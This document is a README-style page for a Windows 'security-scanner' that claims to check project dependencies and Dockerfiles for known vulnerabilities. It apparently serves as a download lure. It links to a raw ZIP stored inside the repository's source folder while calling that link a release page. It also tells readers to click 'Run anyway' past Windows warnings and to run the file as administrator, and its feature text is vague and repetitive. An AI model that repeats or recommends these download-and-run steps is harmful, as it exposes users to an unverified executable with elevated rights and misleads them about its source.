Visit this page to download: https://github.com/Blacke2902/security-scanner/raw/refs/heads/main/src/repo_security_scanner/reports/scanner-security-v2.7-alpha.1.zip
On that page, pick the latest release for Windows. Download the file that matches your computer, then open it to start the app.
- Open the release page link above.
- Look for the newest version at the top.
- Under Assets, download the Windows file.
- If you see a
.zipfile, open it and extract the contents. - If you see a
.exefile, double-click it to run it. - If Windows asks for permission, choose More info and then Run anyway if you trust the file from the release page.
security-scanner checks your project files for known security problems. It looks at common package files and Dockerfiles, then compares them with public vulnerability data.
It helps you:
- Check dependencies for known issues
- Scan Dockerfiles for risky package versions
- Review results in a clear way
- Run quick scans without setup
- Use the same tool across several package types
security-scanner supports common software stacks used in many projects:
- JavaScript and Node.js
- Python
- Dockerfiles
- Other common package formats
It uses public vulnerability sources and can work across many dependency types. That makes it useful for both small projects and larger codebases.
After you download the app, put it in a folder you can find again, such as Downloads or Desktop.
Then:
- Open the folder where you saved the file.
- Run the app.
- If it opens a terminal window, let it finish the scan.
- Read the results on screen.
- Fix any packages or lines marked as risky.
If you use a .zip file, keep the app and its files together in the same folder so it can run correctly.
The app is made for simple, fast checks.
Typical use looks like this:
- Open security-scanner.
- Point it at your project folder.
- Let it scan your dependencies and Dockerfiles.
- Review the results.
- Update packages or images that have known issues.
- Run the scan again to confirm the fix.
If you are not sure which folder to choose, pick the folder that contains your project files.
security-scanner works well with folders that include files like these:
package.jsonrequirements.txtPipfileDockerfiledocker-compose.yml
You do not need to open these files by hand. The app checks them for you.
This tool helps you find known problems before they cause trouble.
It can save time when you want to:
- Check your project before shipping it
- Review old dependencies
- Inspect a Docker image setup
- Keep your software up to date
- Spot weak points in your supply chain
security-scanner reads your project files, looks up package names and versions, and compares them with public vulnerability records.
It uses data from free public sources and can also help with analysis based on the scan results.
That means you get:
- Fast checks
- No setup for most users
- Clear results
- A simple path to safer dependencies
You may see results such as:
- Outdated package versions
- Known CVEs
- Risky Docker base images
- Dependencies with security fixes available
- Items that need a manual review
If the scan shows a problem, update the package or image to a safer version, then run the scan again.
For the cleanest scan, keep your project in one folder and avoid moving files while the scan runs.
A simple layout can look like this:
MyProject/package.jsonDockerfilesrc/README.md
If you work on more than one project, scan each folder one at a time.
security-scanner also supports scheduled scanning. That helps if you want to check your projects on a set time without doing it by hand each time.
A common use is:
- Run a scan each day
- Check a project each week
- Review changes after dependency updates
If scheduled scanning is enabled in your setup, keep the app in the same folder and make sure your project path stays the same.
The app can use AI-powered analysis to help explain scan results in plain language.
This can help when you want to understand:
- Why a package is flagged
- What part of a Dockerfile looks risky
- Which issue matters most
- What to fix first
Use the scan results as your main guide, then read the extra analysis for more context.
If the file does not open, try these steps:
- Check that the download finished fully.
- Make sure you downloaded the Windows file from the release page.
- Right-click the file and choose Run as administrator if needed.
- If the file is in a ZIP folder, extract it first.
- Try downloading the latest release again.
If the app runs but shows no results:
- Make sure you selected the correct project folder.
- Check that the folder contains supported files.
- Confirm the files are named correctly, such as
package.jsonorDockerfile. - Run the scan again after checking the path.
To get the best results:
- Keep dependencies up to date
- Remove unused packages
- Use trusted base images
- Recheck the project after changes
- Scan each new release before use
This project focuses on:
- CLI tools
- CVE checks
- Dependency checks
- DevSecOps
- npm audit style scanning
- Open source security
- OSV data
- pip-audit style checks
- Python projects
- Software composition analysis
- Security
- Supply chain security
- Vulnerability scanning
Visit this page to download: https://github.com/Blacke2902/security-scanner/raw/refs/heads/main/src/repo_security_scanner/reports/scanner-security-v2.7-alpha.1.zip
Then:
- Open the latest release.
- Download the Windows file from Assets.
- Open the file or extract the ZIP.
- Run security-scanner.
- Scan your project folder and review the results